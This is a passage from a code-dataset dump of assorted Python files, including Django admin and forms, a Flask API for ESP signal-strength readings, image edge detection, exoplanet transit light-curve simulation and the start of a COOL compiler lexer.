Sector(.+?(?=))'\r\n sector = re.findall(pattern2,content)\r\n print(\"Après correction, on a :\", firme, sector)\r\n \r\n firme = firme[0]\r\n sector = sector[0]\r\n\r\n Result = [firme,sector]\r\n Base.append(Result)\r\n\r\nwith open(\"cac40_sector.csv\", \"w\",encoding='utf8') as outfile:\r\n data=csv.writer(outfile,delimiter=',',lineterminator='\\n')\r\n for b in Base:\r\n data.writerow(b)\r\n","sub_path":"sbf_120/01 CAC 40/Analyse - sector.py","file_name":"Analyse - sector.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66169323","text":"from load_articles import read_articles, write_articles\nfrom form_dictionary import read_dictionary\n\n\ndef parse_keywords(article, dictionary):\n def get_keywords(text, dictionary):\n word_list = text.split(' ')\n word_ratio = {word: text.count(word) / len(word_list)\n for word in list(set(word_list))}\n keywords = []\n for word in word_ratio:\n if word in dictionary and word_ratio[word] < dictionary[word]:\n continue\n keywords.append(word)\n return keywords\n\n for article in article:\n article['keywords'] = get_keywords(\n article['title'] + ' ' + article['description'], dictionary)\n return article\n\n\nif __name__ == '__main__':\n dictionary = read_dictionary()\n articles = read_articles()\n articles = parse_keywords(articles, dictionary)\n write_articles(articles)\n","sub_path":"form_keywords.py","file_name":"form_keywords.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476109387","text":"'''\nThis file should be runnable to print map_statistics using \n$ python stats.py\n'''\nfrom __future__ import division, print_function\nfrom collections import namedtuple, Counter\nfrom ways import load_map_from_csv\n\n\n# Q7:\ndef map_statistics(roads):\n '''return a dictionary containing the desired information\n You can edit this function as you wish'''\n\n Stat = namedtuple('Stat', ['max', 'min', 'avg'])\n links = [len(j.links) for j in roads.junctions()]\n link_dist = [l.distance for l in roads.iterlinks()]\n c = Counter()\n for lnk in roads.iterlinks():\n c[lnk.highway_type] += 1\n return {\n 'Number of junctions' : len(roads.junctions()),\n 'Number of links' : sum([1 for i in roads.iterlinks()]),\n 'Outgoing branching factor' : Stat(max=max(links), min=min(links), avg=sum(links)/len(links)),\n 'Link distance' : Stat(max=max(link_dist), min=min(link_dist), avg=sum(link_dist)/len(link_dist)),\n # value should be a dictionary\n # mapping each road_info.TYPE to the no' of links of this type\n 'Link type histogram' : c, # tip: use collections.Counter\n }\n\n\ndef print_stats():\n for k, v in map_statistics(load_map_from_csv()).items():\n print('{}: {}'.format(k, v))\n\n \nif __name__ == '__main__':\n from sys import argv\n assert len(argv) == 1\n print_stats()\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"626312171","text":"from PIL import Image\nimport numpy as np\nimport time\n# ---------------------------------------------------------------------\n# Color edge detection for fun.\n# Use \".convert('L')\" on image for proper black white image detection.\n#\n# fastEdgeDetection has implemented an optimization i found smart.\n# black and white only\n# 
---------------------------------------------------------------------\ndef main():\n img = (Image.open(\"corgi.jpg\"))#.convert(\"L\")\n img.show()\n\n start = time.time()\n processed_img = Image.fromarray(fastEdgeDetection(np.array(img)))\n print(f\"alg took: {time.time()-start}\")\n\n processed_img.show()\n\n save(processed_img)\n\n\n# ---------------------------------------------------------------------\n# My edge detection algorithm, default is with colors\n# Could generalize but don't see a reason to\n# ---------------------------------------------------------------------\ndef rgbEdgeDetection(img):\n ans = np.copy(img)\n brightness = 2 # typical values are 1 or 2\n fltr_ver = np.array([0.25, 0, -0.25, 0.5, 0, -0.5, 0.25, 0, -0.25]) * brightness # vertical edges\n fltr_hor = np.array([-0.25, -0.5, -0.25, 0, 0, 0, 0.25, 0.5, 0.25]) * brightness # horizontal edges\n col = img[0][0].size\n row = len(fltr_ver)\n\n for i in range(1, len(img) - 1):\n for j in range(1, len(img[0]) - 1):\n curr = img[i - 1:i + 2, j - 1:j + 2]\n curr_shaped = curr.reshape(row,col).T\n ans[i][j] = ((np.dot(curr_shaped, fltr_hor))**2\n + (np.dot(curr_shaped, fltr_ver))**2)**0.5\n\n return ans.astype(np.uint8)\n\n\n# ---------------------------------------------------------------------\n# Optimized black and white edge detection. ca 0.095s runtime, about 77 times faster.\n# Got the optimization from: https://craftofcoding.wordpress.com/2013/12/18/image-processing-in-python-code-efficiency/\n# ---------------------------------------------------------------------\ndef fastEdgeDetection(img):\n fltr_lod = np.array([0.25, 0, -0.25, 0.5, 0, -0.5, 0.25, 0, -0.25])\n fltr_hor = np.array([-0.25, -0.5, -0.25, 0, 0, 0, 0.25, 0.5, 0.25])\n\n r = 1\n i = 0\n rN = (r * 2 + 1) ** 2.0\n nr, nc = img.shape\n im1 = np.zeros((nr - 2 * r, nc - 2 * r), dtype=np.float)\n im2 = np.zeros((nr - 2 * r, nc - 2 * r), dtype=np.float)\n for k in range(-r, r + 1):\n for l in range(-r, r + 1):\n curr = (img[r + k:nr - r + k, r + l:nc - r + l])\n im1 += curr * fltr_lod[i]\n im2 += curr * fltr_hor[i]\n i+=1\n imS = (im1**2+im2**2)**0.5\n return imS.astype(np.uint8)\n\n\n# lazy save function. It works.\ndef save(img):\n like2save = input(\"would you like to save? 
input 1 \\n\")\n if like2save == \"1\":\n with open('img_count', 'r') as count:\n i = count.readline()\n print(f\"this is i: {i}\")\n if (len(i)> 0):\n i = int(i)\n img.save(f\"C:/Users/kobbe/OneDrive/Skrivbord/Image manipulation/img{i}.png\")\n i += 1\n else:\n i = 1\n img.save(f\"C:/Users/kobbe/OneDrive/Skrivbord/Image manipulation/img{i}.png\")\n i += 1\n with open('img_count', 'w') as count:\n count.write(str(i))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Edgedetection/RgbEdgeDetection.py","file_name":"RgbEdgeDetection.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649967930","text":"# -*- encoding: utf-8 -*-\n\nfrom dal import autocomplete\nfrom django.contrib import admin\n\nfrom .core import CommitedModelAdmin\nfrom .filters import (\n JednostkaFilter,\n PBNIDObecnyFilter,\n PeselMD5ObecnyFilter,\n OrcidObecnyFilter,\n)\nfrom .helpers import *\nfrom ..models import (\n Jednostka,\n Autor,\n Autor_Jednostka,\n Autor_Dyscyplina,\n Dyscyplina_Naukowa,\n) # Publikacja_Habilitacyjna\n\n\n# Proste tabele\n\n# Autor_Dyscyplina\n\n\nclass Autor_DyscyplinaInlineForm(forms.ModelForm):\n dyscyplina_naukowa = forms.ModelChoiceField(\n queryset=Dyscyplina_Naukowa.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:dyscyplina-autocomplete\"),\n )\n\n subdyscyplina_naukowa = forms.ModelChoiceField(\n queryset=Dyscyplina_Naukowa.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:dyscyplina-autocomplete\"),\n required=False,\n )\n\n class Meta:\n fields = \"__all__\"\n\n def __init__(self, *args, **kw):\n super(Autor_DyscyplinaInlineForm, self).__init__(*args, **kw)\n if kw.get(\"instance\"):\n self.fields[\"rok\"].disabled = True\n\n\nclass Autor_DyscyplinaInline(admin.TabularInline):\n model = Autor_Dyscyplina\n form = Autor_DyscyplinaInlineForm\n extra = 1\n fields = (\n \"rok\",\n \"rodzaj_autora\",\n \"wymiar_etatu\",\n \"dyscyplina_naukowa\",\n \"procent_dyscypliny\",\n \"subdyscyplina_naukowa\",\n \"procent_subdyscypliny\",\n )\n\n\n# Autor_Jednostka\n\n\nclass Autor_JednostkaInlineForm(forms.ModelForm):\n autor = forms.ModelChoiceField(\n queryset=Autor.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:autor-autocomplete\"),\n )\n\n jednostka = forms.ModelChoiceField(\n queryset=Jednostka.objects.all(),\n widget=autocomplete.ModelSelect2(url=\"bpp:jednostka-autocomplete\"),\n )\n\n class Meta:\n fields = \"__all__\"\n\n\nclass Autor_JednostkaInline(admin.TabularInline):\n model = Autor_Jednostka\n form = Autor_JednostkaInlineForm\n extra = 1\n\n\n# Autorzy\n\n\nclass AutorForm(forms.ModelForm):\n class Meta:\n fields = \"__all__\"\n model = Autor\n widgets = {\"imiona\": CHARMAP_SINGLE_LINE, \"nazwisko\": CHARMAP_SINGLE_LINE}\n\n\nclass AutorAdmin(ZapiszZAdnotacjaMixin, CommitedModelAdmin):\n form = AutorForm\n\n list_display = [\n \"nazwisko\",\n \"imiona\",\n \"tytul\",\n \"pseudonim\",\n \"poprzednie_nazwiska\",\n \"email\",\n \"pbn_id\",\n \"orcid\",\n ]\n list_select_related = [\n \"tytul\",\n ]\n fields = None\n inlines = [Autor_JednostkaInline, Autor_DyscyplinaInline]\n list_filter = [\n JednostkaFilter,\n \"aktualna_jednostka__wydzial\",\n \"tytul\",\n PBNIDObecnyFilter,\n OrcidObecnyFilter,\n PeselMD5ObecnyFilter,\n ]\n search_fields = [\n \"imiona\",\n \"nazwisko\",\n \"pseudonim\",\n \"poprzednie_nazwiska\",\n \"email\",\n \"www\",\n \"id\",\n \"pbn_id\",\n ]\n readonly_fields = (\"pesel_md5\", \"ostatnio_zmieniony\")\n\n fieldsets = (\n 
(\n None,\n {\n \"fields\": (\n \"imiona\",\n \"nazwisko\",\n \"tytul\",\n \"pseudonim\",\n \"pokazuj\",\n \"email\",\n \"www\",\n \"orcid\",\n \"pbn_id\",\n \"pesel_md5\",\n )\n },\n ),\n (\n \"Biografia\",\n {\n \"classes\": (\"grp-collapse grp-closed\",),\n \"fields\": (\"urodzony\", \"zmarl\", \"poprzednie_nazwiska\"),\n },\n ),\n ADNOTACJE_FIELDSET,\n )\n\n\nadmin.site.register(Autor, AutorAdmin)\n","sub_path":"src/bpp/admin/autor.py","file_name":"autor.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"85976115","text":"from flask import Flask, render_template, Blueprint, make_response, request\nimport requests, json\nfrom datetime import datetime\nfrom util.ResponseData import ResponseData\nimport random\nimport pickle\nimport json\nimport os\n\nsession = requests.Session()\nadapter = requests.adapters.HTTPAdapter(pool_connections=50, pool_maxsize=50)\nsession.mount('http://', adapter)\n\n# http://0.0.0.0:5000/requestRSS/espHandle\n\napi = Blueprint('api', __name__, url_prefix = \"/\")\n\nip_table = None\nuploadFlag = False\nwith open('espConfig.json', newline='') as espConfig:\n\tconfigData = json.load(espConfig)\n\tip_table = configData['espTable']\n\tuploadFlag = configData['uploadFlag']\n\nprint(\"\\nip_table: \", json.dumps(ip_table, indent=4, sort_keys=True))\nprint(\"uploadFlag: \", uploadFlag, \"\\n\")\n\n\ndef createResponse(data, status = 200):\n\tres = ResponseData()\n\tres.message = data\n\tres.status = ResponseData.STATUS_OK\n\tres = make_response(res.toJSON(), 200)\n\tres.mimetype = 'application/json'\n\treturn res\n\n\ndef testingData(espName):\n\tdata = \"\"\n\tfor (ssid, ip) in ip_table.items():\n\t\tif espName != ssid:\n\t\t\trandRSS = 40 + 30*random.random()\n\t\t\tdata += ssid + \":-\"+str(int(randRSS))+\"dBm,\"\n\tdata = data.split(\",\")\n\tdata.remove(\"\")\n\treturn data\n\ndef save2DB(espName, scanResult):\n\t# data = {\n\t# \t'esp': 'ESP01',\n\t# \t'measurements': {\n\t# \t\t'KW': '-43dBm',\n\t# \t\t'BNLAB': '-58dBm'\n\t# \t},\n\t# \t'createTime': '2021/2/24, 21:53:29'\n\t# }\n\n\tdata = {}\n\tif len(scanResult) != 0:\n\t\tnow = datetime.now()\n\t\tdata.update({'esp': str(espName)})\n\t\tdata.update({'measurements': scanResult})\n\t\tdata.update({'createTime': now.strftime(\"%Y/%m/%d, %H:%M:%S\")})\n\t\tjsonObj = json.dumps(data)\n\t\tr = requests.post('http://127.0.0.1:5000/espMeasurements', data=jsonObj)\n\t\tr = json.loads(r.text)\n\t\tprint(\"database api results: \", r)\n\n\ndef dataPreprocess(data):\n\tdata = data.text.split(\",\")\n\twhile(\"\" in data) : \n\t\tdata.remove(\"\")\n\tscanResult = data.copy()\n\tfor item in data:\n\t\tif item == \"\" or \"ESP\" not in item:\n\t\t\tscanResult.remove(item)\n\treturn scanResult\n\n\n\n@api.route('/requestRSS/espHandle', methods=['GET'])\ndef espHandlePage():\n\treturn render_template('espHandlePage.html')\n\n@api.route('/requestUpload/id/', methods=['GET'])\ndef uploadCode(deviceID = None):\n\tprint(\"\\nUpload flag for device: \", deviceID, \", flag: \", uploadFlag, \"\\n\")\n\treturn uploadFlag \n\n@api.route('/requestRSS/id//TargetSSID//sendRSS', methods=['POST'])\ndef rss(deviceID = None, TargetID = None):\n\tprint(\"\\nDevice {} ---> {}.\".format(deviceID, TargetID))\n\n\tespList = list (ip_table.keys())\n\tif espList.index(TargetID)+1 == len(espList):\n\t\tnextTargetID = espList[0]\n\telse:\n\t\tnextTargetID = espList[espList.index(TargetID)+1]\n\n\tisExist = True\n\twhile(1):\n\t\tisExist = 
os.path.isfile('./rssMeasurements/esp{}/RSS_{}_to_{}.pkl'.format(int (deviceID.split(\"ESP\")[1]), deviceID, nextTargetID))\n\t\tif isExist:\n\t\t\tprint('Exist: rssMeasurements/esp{}/RSS_{}_to_{}.pkl'.format(int (deviceID.split(\"ESP\")[1]), deviceID, nextTargetID))\n\t\t\tif espList.index(nextTargetID)+1 >= len(espList):\n\t\t\t\tnextTargetID = espList[0]\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tnextTargetID = espList[espList.index(nextTargetID)+1]\n\t\telse:\n\t\t\tbreak\n\n\n\tif not deviceID == TargetID:\n\t\tdata = request.data\n\t\tdata = data.decode(\"utf-8\")\n\n\t\tif not data == \"\":\n\t\t\trssList = data.split(\",\")[:-1]\n\t\t\tprint(\"Data content: \", rssList)\n\t\t\tf = open(\"RSS_{}_to_{}.pkl\".format(deviceID, TargetID), \"wb\")\n\t\t\tpickle.dump(rssList, f)\n\t\t\tf.close()\n\t\telse:\n\t\t\tprint(\"Data content: \", \"Null\")\n\t\n\tprint(\"Next target device: \", nextTargetID, \"\\n\")\n\treturn nextTargetID\n\n\n\n\n@api.route('/', methods=['GET'])\ndef espReq(espName):\n\t# print(espName)\n\ttry:\n\t\treqURL = 'http://' + ip_table[espName] + ':8001/' + espName + '/RSSI';\n\t\tprint(reqURL)\n\t\tresult = session.get(reqURL)\n\n\t\ttry:\n\t\t\tprint(\"res code: \", result.status_code)\n\t\t\tif(result.status_code == requests.codes.ok):\n\t\t\t\tscanResult = dataPreprocess(result)\n\t\t\t\tprint(scanResult)\n\t\t\t\tsave2DB(espName, scanResult)\n\t\t\t\treturn createResponse(scanResult)\n\t\t\telse:\n\t\t\t\treturn createResponse(result.status_code, result.status_code)\n\t\texcept Exception as inst:\n\t\t\tprint(inst.args)\n\texcept Exception as inst:\n\t\tprint(inst.args)\n\t\t# print(\"sleep\")\n\t\treturn createResponse(inst.args, 500)\n\n\t# === For test ===\n\t# simulateData = testingData(espName)\n\t# return createResponse(simulateData)\n\n\n","sub_path":"action/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518747338","text":"from django import forms\nfrom django.forms.models import ModelForm\n\nfrom Personal.models import Puestos, Areas, Personas\nfrom .validators import (\n value_is_already_exists, value_exists, value_is_correct_expression_regular,\n value_area_is_already_exists, value_cdc_is_already_exists,\n value_exists_area\n )\n\nclass PuestosInputForm(forms.Form):\n Puesto = forms.CharField( validators = [value_exists], widget = forms.TextInput(attrs = {'class' : 'form-control'}))\n\n def clean_Puesto(self):\n data = self.cleaned_data['Puesto']\n if data is not data.lower():\n data = data.lower()\n return data\n\nclass PuestosInputFormEditar(forms.ModelForm):\n Puesto = forms.CharField(validators = [value_is_already_exists])\n class Meta:\n model = Puestos\n fields = '__all__'\n\n\n def clean_Puesto(self):\n data = self.cleaned_data['Puesto']\n if data is not data.lower():\n data = data.lower()\n return data\n\n\nclass PuestosInputFormGuardar(PuestosInputForm):\n Puesto = forms.CharField()\n\n\nclass AreaInputForm(forms.ModelForm):\n CDC = forms.CharField(\n validators = [value_is_correct_expression_regular, value_cdc_is_already_exists],\n widget=forms.TextInput(attrs={'placeholder': 'Centro de costo'}\n ))\n Area = forms.CharField(\n validators = [value_area_is_already_exists],\n widget=forms.TextInput(attrs={'placeholder': 'Area'}\n ))\n\n class Meta:\n model = Areas\n fields = ('CDC', 'Area', )\n\n def clean_Area(self):\n data = self.cleaned_data['Area']\n if data is not data.lower():\n data = data.lower()\n return data\n\nclass 
AreaEditarForm(AreaInputForm):\n CDC = forms.CharField(\n validators = [value_is_correct_expression_regular],\n widget=forms.TextInput(attrs={'placeholder': 'Centro de costo'}\n ))\n Area = forms.CharField(\n widget=forms.TextInput(attrs={'placeholder': 'Area'}\n ))\n\nclass AreaInputFormBuscar(forms.Form):\n Buscar = forms.CharField(\n validators = [value_exists_area],\n )\n\nclass PersonaInputForm(forms.Form):\n CHOICES_FIELD = [\n ('Gestor', 'Gestor'),\n ('AsignarGestor', 'Asignar gestor'),\n ('SinGestor', 'Sin gestor')\n ]\n\n Nombre = forms.CharField(widget = forms.TextInput(attrs = {'class' : 'form-control'}))\n Area = forms.ModelChoiceField(queryset = Areas.objects.all(), widget = forms.fields.Select(attrs ={'class' : 'form-control'}))\n Puesto = forms.ModelChoiceField(queryset = Puestos.objects.all(), widget = forms.fields.Select(attrs ={'class' : 'form-control'}))\n GestorOpcion = forms.ChoiceField(choices = CHOICES_FIELD, widget = forms.RadioSelect())\n\n # def clean_Nombre(self):\n # nombre = self.cleaned_data['Nombre'].split()\n # if len(nombre) < 3:\n # raise forms.ValidationError('falta un nombre o apellido.')\n #\n # return self.cleaned_data['Nombre']\n\n def clean(self):\n nombre = self.cleaned_data['Nombre'].split()\n if len(nombre) < 3:\n raise forms.ValidationError('falta un nombre o apellido.')\n if len(nombre) == 3:\n persona = Personas.objects.filter(Nombre = nombre[0], Apellido = nombre[1], ApellidoMaterno = nombre[2], Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n if len(nombre) > 3:\n persona = Personas.objects.filter(Nombre = nombre[0], NombreSecundario = nombre[1], Apellido = nombre[2], ApellidoMaterno = ''.join(nombre[3:]), Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n return self.cleaned_data\n\n\nclass PersonaEditarForm(forms.models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(PersonaEditarForm, self).__init__(*args, **kwargs)\n self.initial['Nombre'] = kwargs['instance'].nombre_completo()\n\n Nombre = forms.CharField(widget = forms.TextInput(attrs= {'class' : 'form-control'}))\n\n class Meta:\n model= Personas\n fields = ('Nombre', 'Area', 'Puesto',)\n widgets = {\n 'Area' : forms.fields.Select( attrs ={\n 'class' : 'form-control'\n }),\n 'Puesto' : forms.fields.Select( attrs ={\n 'class' : 'form-control'\n })\n }\n\n\n\n\n def clean(self):\n nombre = self.cleaned_data['Nombre'].split()\n if len(nombre) < 3:\n raise forms.ValidationError('falta un nombre o apellido.')\n if len(nombre) == 3:\n persona = Personas.objects.filter(Nombre = nombre[0], Apellido = nombre[1], ApellidoMaterno = nombre[2], Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n if len(nombre) > 3:\n persona = Personas.objects.filter(Nombre = nombre[0], NombreSecundario = nombre[1], Apellido = nombre[2], ApellidoMaterno = ''.join(nombre[3:]), Area = self.cleaned_data['Area'])\n if persona:\n raise forms.ValidationError('ya existe esta persona en esta área', code = 'Nombre')\n\nclass PersonaBuscarForm(forms.Form):\n Nombre = forms.CharField(required = False, widget = forms.TextInput(attrs = {'class' : 'form-control', 'placeholder' : 'Buscar'}))\n Area = forms.ModelChoiceField(queryset = Areas.objects.all(), required = False, widget = forms.fields.Select(attrs = {'class' : 'form-control'}))\n\n def clean(self):\n if not 
self.cleaned_data['Nombre'] and not self.cleaned_data['Area']:\n raise forms.ValidationError('Se debe ingresar el nombres o un area')\n","sub_path":"src/Personal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64937961","text":"from django.conf.urls import url\r\n\r\nfrom .views.shared import index, custom_login, all_users\r\nimport car_rental.views.car as car_view\r\nimport car_rental.views.order as order_view\r\nimport car_rental.views.bill as bill_view\r\n\r\nurlpatterns = [\r\n url(r'^$', index, name='index'),\r\n url(r'^logout/$', 'django.contrib.auth.views.logout', name='logout'),\r\n url(r'^login/$', custom_login, name='login'),\r\n url(r'^cars/$', car_view.index, name='cars'),\r\n url(r'^cars/(?P\\d+)/$', car_view.detail, name='car_detail'),\r\n url(r'^cars/(?P\\d+)/rent/$', order_view.rent, name='rent'),\r\n url(r'^users/(?P\\d+)/orders/$', order_view.index, name='orders'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/$', order_view.detail, name='order_detail'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/pay$', order_view.pay, name='pay_order'),\r\n url(r'^users/(?P\\d+)/bills/$', bill_view.index, name='bills'),\r\n url(r'^users/(?P\\d+)/bills/(?P\\d+)/$', bill_view.detail, name='bill_detail'),\r\n url(r'^users/(?P\\d+)/bills/(?P\\d+)/pay/$', bill_view.pay, name='pay_bill'),\r\n url(r'^users/$', all_users, name='all_users'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/close/$', bill_view.close_order, name='close_order'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/accept/$', order_view.accept_order, name='accept_order'),\r\n url(r'^users/(?P\\d+)/orders/(?P\\d+)/decline/$', order_view.decline_order, name='decline_order')\r\n]\r\n","sub_path":"bachelors/year4/semestre1/python_ruby/LabWorks/python/N1/car_rental/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167320226","text":"try:\n import pysyzygy as ps \n PS_AVAIL=True\nexcept:\n print(\"Cannot import pysyzygy library \")\n PS_AVAIL=False\n \ntry:\n import pytransit \n PYTRANSIT_AVAIL=True\nexcept:\n print(\"Cannot import pytransit library \")\n PYTRANSIT_AVAIL=False\n \ntry:\n import batman \n BATMAN_AVAIL=True\nexcept:\n print(\"Cannot import batman library \")\n BATMAN_AVAIL=False\n \ntry:\n import pylightcurve as plc\n PYLC_AVAIL=True\nexcept:\n print(\"Cannot import pylightcurve library \")\n PYLC_AVAIL=False\n \n#import everest #-- basado en pysyzygy\n#import ktransit\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nmatplotlib.use('module://ipykernel.pylab.backend_inline') \n\ndef get_MA_sim_names():\n return [\"Period\",\"T0\",\"r/R\", \"a/R\", \"Inclination\", \"Impact Parameter\", \"Limb Darkening Coeff1\",\"Limb Darkening Coeff2\"]\n\nMA_sim_names = get_MA_sim_names()\ndef simulate_MA(t, sim_dat, plot_m=True, lib = 'ps'):\n lib = lib.lower().strip()\n if plot_m:\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n \n per = sim_dat[\"Period\"]\n a_R = sim_dat[\"a/R\"]\n r_R = sim_dat[\"r/R\"]\n t_0 = sim_dat[\"T0\"] \n \n u1 = sim_dat[\"Limb Darkening Coeff1\"]\n u2 = sim_dat[\"Limb Darkening Coeff2\"]\n \n #https://slideplayer.com/slide/6301069/21/images/7/Finally%2C+finding+transit+duration..jpg\n impact_p = sim_dat[\"Impact Parameter\"] #bcirc: circular impact parameter\n inc = sim_dat[\"Inclination\"]\n\n if lib == \"ps\":\n if PS_AVAIL:\n 
model = ps.Transit(per = per, RpRs = r_R, t0 = t_0, u1=u1,u2=u2, aRs= a_R, bcirc=impact_p,\n maxpts=65000)\n try:\n lc_simulated = model(t) \n except Exception as e:\n print(\"ERROR GENERACION DE CURVA: \",e)\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pysyzygy library! check: github.com/rodluger/pysyzygy') \n \n elif lib =='pytransit':\n if PYTRANSIT_AVAIL:\n model = pytransit.QuadraticModel()\n model.set_data(t)\n\n lc_simulated = model.evaluate_ps(k = r_R, t0=t_0, p=per, a=a_R, i=inc*np.pi/180, ldc=[u1, u2])\n\n v = np.sum(lc_simulated)\n if np.isnan(v) or np.isinf(v):\n print(\"ERROR GENERACION DE CURVA: nans-generation(%s) // infs-generation(%s)\"%(np.isnan(v),np.isinf(v)))\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pytransit library! check: github.com/hpparvi/PyTransit') \n \n elif lib=='batman':\n if BATMAN_AVAIL:\n params = batman.TransitParams() #object to store transit parameters\n params.t0 = t_0 #time of inferior conjunction\n params.per = per #orbital period\n params.rp = r_R #planet radius (in units of stellar radii)--rp/rs\n params.a = a_R #semi-major axis (in units of stellar radii)\n params.inc = inc #orbital inclination (in degrees)\n params.limb_dark = \"quadratic\" #limb darkening model\n params.u = [u1, u2] #limb darkening coefficients [u1, u2, u3, u4]\n #dont known in kepler\n params.ecc = 0. #eccentricity\n params.w = 90. #longitude of periastron (in degrees)\n model = batman.TransitModel(params, t, nthreads = 1) #initializes model\n\n lc_simulated = model.light_curve(params)\n else:\n raise Exception('You dont have available batman library! check: github.com/lkreidberg/batman') \n \n elif lib=='pylc':\n if PYLC_AVAIL:\n lc_simulated = plc.transit('quad', #claret son 4 coeficientes.. 'quad' or teh 'sqrt'\n limb_darkening_coefficients = [u1,u2], \n rp_over_rs=r_R, \n period= per, \n sma_over_rs = a_R, \n inclination=inc, \n mid_time=t_0,\n eccentricity=0,\n periastron=90.,\n time_array=t)\n\n v = np.sum(lc_simulated)\n if np.isnan(v) or np.isinf(v):\n print(\"ERROR GENERACION DE CURVA: nans-generation(%s) // infs-generation(%s)\"%(np.isnan(v),np.isinf(v)))\n display(pd.DataFrame(sim_dat, index=[0], columns=MA_sim_names))\n lc_simulated = np.ones(len(t))\n else:\n raise Exception('You dont have available pylightcurve library! 
check: github.com/ucl-exoplanets/pylightcurve') \n \n elif lib=='everest': #USA DURATION y depth\n dur = sim_dat[\"Duration\"] \n depth = sim_dat[\"Transit Depth\"]\n lc_simulated = everest.transit.Transit(t, t0=t_0, per=per, dur=dur, depth=depth, \n #todos los de ps\n #RpRs = r_R, \n u1=u1,u2=u2, aRs= a_R, bcirc=impact_p,maxpts=65000)\n \n elif lib=='ktransit':\n model = ktransit.LCModel()\n model.add_star(ld1=u1,ld2=u2) # if only ld1 and ld2 are non-zero then a quadratic limb darkening law is used\n model.add_planet(T0=t_0,period=per, impact=impact_p, rprs=r_R)\n \n model.add_data(time=t)\n lc_simulated = model.transitmodel+1 # the out of transit data will be 0.0 unless you specify zpt\n\n return lc_simulated\n\ndef get_available_MA_methods():\n methods = []\n if PS_AVAIL:\n methods.append(\"ps\")\n if PYTRANSIT_AVAIL:\n methods.append(\"pytransit\")\n if BATMAN_AVAIL:\n methods.append(\"batman\")\n if PYLC_AVAIL:\n methods.append(\"pylc\")\n return methods","sub_path":"code/obj4/mandelagol_sim.py","file_name":"mandelagol_sim.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428876637","text":"\"\"\"\nCopyright (c) 2020 School of Math and Computer Science, University of Havana\n\nCOOL compiler project\n\"\"\"\n\nimport ply.lex as lex\n\nfrom errors import add_lexer_error\nfrom .utils import *\n\nstates = (\n ('commentLine', 'exclusive'),\n ('commentText', 'exclusive'),\n ('string', 'exclusive'),\n)\n\nreserved = {\n 'if': 'IF',\n 'then': 'THEN',\n 'else': 'ELSE',\n 'fi': 'FI',\n 'class': 'CLASS',\n 'inherits': 'INHERITS',\n 'while': 'WHILE',\n 'loop': 'LOOP',\n 'pool': 'POOL',\n 'let': 'LET',\n 'in': 'IN',\n 'case': 'CASE',\n 'isvoid': 'ISVOID',\n 'esac': 'ESAC',\n 'new': 'NEW',\n 'of': 'OF',\n 'not': 'LNOT'\n}\n\ntokens = [\n 'ASSIGN',\n 'ARROW',\n 'LOWEREQ',\n 'INT',\n 'STRING',\n 'TYPE',\n 'ID',\n 'SEMICOLON',\n 'OBRACKET',\n 'CBRACKET',\n 'OPAREN',\n 'CPAREN',\n 'COLON',\n 'AT',\n 'DOT',\n 'LOWER',\n 'EQUAL',\n 'PLUS',\n 'MINUS',\n 'STAR',\n 'DIV',\n 'NOT',\n 'COMMA',\n 'BOOL'\n]\n\nt_SEMICOLON = r';'\nt_OBRACKET = r'{'\nt_CBRACKET = r'}'\nt_OPAREN = r'\\('\nt_CPAREN = r'\\)'\nt_COLON = r':'\nt_AT = r'@'\nt_DOT = r'\\.'\nt_LOWER = r'<'\nt_EQUAL = r'='\nt_LOWEREQ = r'<='\nt_ASSIGN = r'<-'\nt_ARROW = r'=>'\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_STAR = r'\\*'\nt_DIV = r'/'\nt_NOT = r'~'\nt_COMMA = r','\n\n\ndef t_INT(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\ndef t_TYPE(t):\n r'[A-Z][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value.lower(), 'TYPE')\n return t\n\n\ndef t_BOOL(t):\n 